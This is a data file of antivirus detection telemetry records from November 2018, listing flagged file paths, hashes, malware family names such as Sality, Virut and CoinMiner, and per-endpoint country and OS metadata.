  Row(detection=Row(filename='avscan-20181101-213405-df763bdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a97431c\\AVSCAN-20181101-213149-CBD05A7C\\AVSCAN-20181101-213405-DF763BDB', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:34:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112613-d18e821c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1170768d\\AVSCAN-20181101-112313-C1DC4E43\\AVSCAN-20181101-112613-D18E821C', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:26:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003034-d75d3a72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09479a50\\AVSCAN-20181101-232059-A9CB4FEB\\AVSCAN-20181102-003034-D75D3A72', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='e3846c1077ae67fbb7d6358665a259a746c8130fa61aedbda814c5322fb633d5', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:29:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-012538-953caf83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181101-005657-94C4467B\\AVSCAN-20181104-012538-953CAF83', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T00:40:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:32:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144339-2ba6bf7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e7ed61ca\\AVSCAN-20181104-144152-1EAE94FB\\AVSCAN-20181104-144339-2BA6BF7C', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:43:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103050-07d39a1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8c0249e0\\AVSCAN-20181104-102926-F6A44DE3\\AVSCAN-20181104-103050-07D39A1C', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:30:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0348217.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0348217.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:29:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='98004ae02e5eb19d5974d579a985c8a5c4c694e39b86f79ed19318015aaa4459', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:53:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bdcamsetup.exe', filepath='C:\\Users\\X\\Documents\\Programs\\bdcamsetup.exe', filesize=17600000, name='W32/Virut.Gen.#M1.#R1'), hash='62e2ae62607f6c47921f45dccda776f9bce39b44644294f687eb79358063deec', metadata=Row(cmdline='\\\\\\/onboot', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Internet Download Manager\\IDMan.exe', parentsize=4100152, timestamp='2018-11-04T02:47:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-06-16-44.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T00:27:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-04T17:30:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240ef', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240ef', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:44:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='windows.exe', filepath='C:\\ProgramData\\NVIDIA bas\\windows.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:41:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211036-a3de26af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-211036-A3DE26AF', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:10:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024351', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024351', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:46:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='233720a44695ce0cb1398f9686f066970b62ce1c666704fd5b618f4032cdee42', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T10:44:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T15:19:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:11:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:43:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131603-2d0409bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131603-2D0409BF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\PROGRAM FILES\\GAMEHOUSE GAMES COLLECTION\\ANCIENT TRIPEAKS\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='2e7e18c5fdf00ac0b45f3880a122cda23d38d3a23120ad2a967b27863dcdaee8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-04T08:42:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e3d31ed9-547f-badb-4cde-8837ecca84e4.exe', filepath='K:\\{8105c66b-0ad1-36ee-b614-0917263830e2}\\e3d31ed9-547f-badb-4cde-8837ecca84e4.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4673304, timestamp='2018-11-04T18:28:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='darc (2018) [webrip] [720p] [yts.am].exe', filepath='D:\\Darc (2018) [WEBRip] [720p] [YTS.AM].exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='6ae6e7750855fd6c28a711bfd8012c3a494adba23f110e43dabe22f74e71bbb6', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1772072, timestamp='2018-11-04T03:28:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='photo caravane cfp ndoulo.exe', filepath='G:\\PHOTO CARAVANE CFP Ndoulo.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:14:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T09:00:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T17:20:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='birthday.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-55JSJ.tmp\\Birthday.exe', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:00:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fasil', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fasil', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='7a7861079f8bfbb11f413c6082bea20597e46c1b72e952e225c0cab6f75fbb4c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:24:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:15:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153951-5e01cfb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5aa200c1\\AVSCAN-20181104-153257-26C48B62\\AVSCAN-20181104-153951-5E01CFB4', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:39:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:05:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='522205966738ddc518dd98c29751910064e0c415c6081c2263e4c4ddee0046a8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:51:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dresume.exe', filepath='c:\\microgaming\\casino\\luxury casino\\dresume.exe', filesize=1024000, name='GAME/Casino.Gen.#M1.#R1'), hash='49f7979921ed9e8a90658b1fa0837e9f0befe740bc52b793062a83f390650809', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:40:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='htccalc.exe', filepath='C:\\Users\\X\\Desktop\\root\\Neu 2018\\Neuer Ordner1\\Boxs Cracked 2015-2016\\AutoPlay\\Docs\\Volcano Tool\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='dc89f8c174ad6632efaa2e672615d4c58372509964e57216b49356c82c73e1b5', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:lYExWhkwpkq\\\\\\/gcZV.1', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:16:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lamec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lamec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9495cb03db3984712ece3e07887ad7fa02691bddd7312fd8b26552df820ea2d5', metadata=Row(cmdline='{E91BDFBB-3A38-4C2A-B712-654B088A594A} S-1-5-21-2794136099-1125328227-3096756092-1002:SASCHAM\\\\\\\\Sascha:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=239616, timestamp='2018-11-04T11:59:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mell.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Curtails\\mell.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='48b3294ebedde43151ade7342018800be31175d8f8f9b1fb075258e0ef1f65bb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:51:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sures.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\L210_WW_WIN_3793_42\\LIB\\0415\\sures.dll', filesize=324000, name='W32/Ramnit.C.#M1.#R1'), hash='684363cde47c2aae3559e899f0184f3b6bbe1fca44a16dbb5e96decd0226a614', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673040, timestamp='2018-11-04T02:10:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsn1BFA.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\fotor_3.41.exe', parentsize=268416568, timestamp='2018-11-04T12:14:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123921-453f8394', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-123921-453F8394', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:39:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$DIa2200.30489\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\VAPE 2.47 CRACKED.rar\\\\\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1521880, timestamp='2018-11-04T22:50:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:22:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171736-d2fd4408', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16cd0bb0\\AVSCAN-20181104-171548-BCEDC557\\AVSCAN-20181104-171736-D2FD4408', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:17:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cfp.exe', filepath='\\\\?\\C:\\Miracle Team\\Miracle Thunder\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='74a296b080a0e3e15ce7c82a7bf73e5577d20792d5dfccfcf116a7e00f90ea56', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:09:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:29:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='controlpanel.exe', filepath='C:\\Program Files\\SmarThru 4\\ControlPanel.exe', filesize=512000, name='W32/Sality.AT.#M0.#R0'), hash='9bd36db0c3a80d4ce945da667a80c5cf7bf8dcdd90c72beb2b3ec1502993641c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T07:58:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d250', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d250', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adberdr707_es_es.exe', filepath='\\\\anomianas\\share\\materiale studio\\trashbox\\forniture\\METALCO\\metalco_cataloghi\\escofet (e)\\adberdr707_es_es.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='92c5a8c64f484d6f0a5c46717053153e82fbef2ae324e33474f22c7704fb7a26', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CXsIGuRX906lzRI6.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9f3ef947f7082bf578689427e9be445bb650a727ca3ad8d73e0277c50703630f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9F3EF947F7082BF578689427E9BE445BB650A727CA3AD8D73E0277C50703630F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9f3ef947f7082bf578689427e9be445bb650a727ca3ad8d73e0277c50703630f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qlwvivqn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\qLWviVqn.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000fe229', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000fe229', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='handbuch-for-220-downloader.exe', filepath='\\\\MBWSERVER\\03 Buchhaltung\\Richter\\PC 1\\eigene Dateien PC1\\Downloads\\Zinsberechnungen\\handbuch-for-220-Downloader.exe', filesize=472000, name='PUA/DownloadGuide.Gen.#M300.#R6099'), hash='8cb630568b88e31b988e89bd96321fddc86529026ec1fecc21be02f7ce38bd47', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T16:14:11Z'), dt=datetime.date(2018, 11, 2)),
